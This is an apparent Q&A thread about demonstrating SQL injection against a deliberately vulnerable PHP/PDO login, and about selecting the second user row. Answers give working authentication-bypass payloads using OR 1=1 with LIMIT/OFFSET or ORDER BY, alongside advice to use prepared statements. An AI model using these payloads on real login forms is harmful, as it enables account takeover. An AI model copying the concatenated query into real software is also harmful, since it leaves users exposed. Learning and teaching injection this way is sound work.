# SQL login injection, selecting the second row

Tags: php, sql, sql-injection

I have this sample php code that i want to demostrate SQL injection with.I have been able to login using ' or 1=1--  but it select the first row. I want to slect the second user .My table has only two users.Now i want to base my injection with the following code ' OR 1 =1 ORDER BY login DESC LIMIT 1 -- but it is resulting to an error.that is Fatal error: Uncaught Error: Call to a member function rowCount() .The question is how can i select the second row.

Here is by php code :

```
 try {
 $db = new PDO($db_conn_str, $db_username, $db_password);
 $query = "select * from " . $db_tablename . " where login='" . 
 $_POST["username"] . "' and passwd='" . $_POST["password"] . "'";
 /*echo "$query <br /><br />";*/
 $result = $db->query($query);
 $num=$result->rowCount();
 } catch (PDOException $e) {
  echo "Error in PDO: " . $e->getMessage();
```

Answer (score 2):

Try  `' OR 1 = 1 LIMIT 1 OFFSET 1` for the query.

Comment: ok, but when i key in a login form am as ' OR '1' = 1 LIMIT 1 OFFSET 1-- am getting  Fatal error: Uncaught Error: Call to a member function rowCount() on boolean

Comment: var_dump `$result` or try the sql query on the database to see if it works

Answer (score 1):

OR condition should go with brackets before ORDER BY.

So it should be like this:

```
$_POST["username"] = "";
$_POST["password"] = "' OR (1=1) ORDER BY login DESC LIMIT 1--";
```

If you print out your query, it will be this:

```
select * from table_name where login='' and passwd='' OR (1=1) ORDER BY login DESC LIMIT 1--'
```

And it would be surprised to see someone using PDO without a prepared statement.

Comment: Your ' or 1=1-- is more than enough to demonstrate sql injection. So please use it ethically

Answer (score 0):

Use **Prepared statement** of PDO instead of this simple method. It Can't stop SQL Injection. for your support click below
http://php.net/manual/en/pdo.prepared-statements.php
http://php.net/manual/en/pdo.prepare.php

Example Given Below:

> $stmt = $pdo->prepare('SELECT * FROM users WHERE email = ? AND
>   status=?'); $stmt->execute([$email, $status]);
>   $user = $stmt->fetch();

Comment: AM testing some sql injcetion that can login using the second row

Comment: why this should return 2 rows? users table is supposed to have unique usernames, so there can't be two rows fetched in practical. explain your question please?

Comment: I mean , while knowing the first user, how can you login as the second database user? using SQL injection

Comment: They WANT to have SQL injection, not stop it.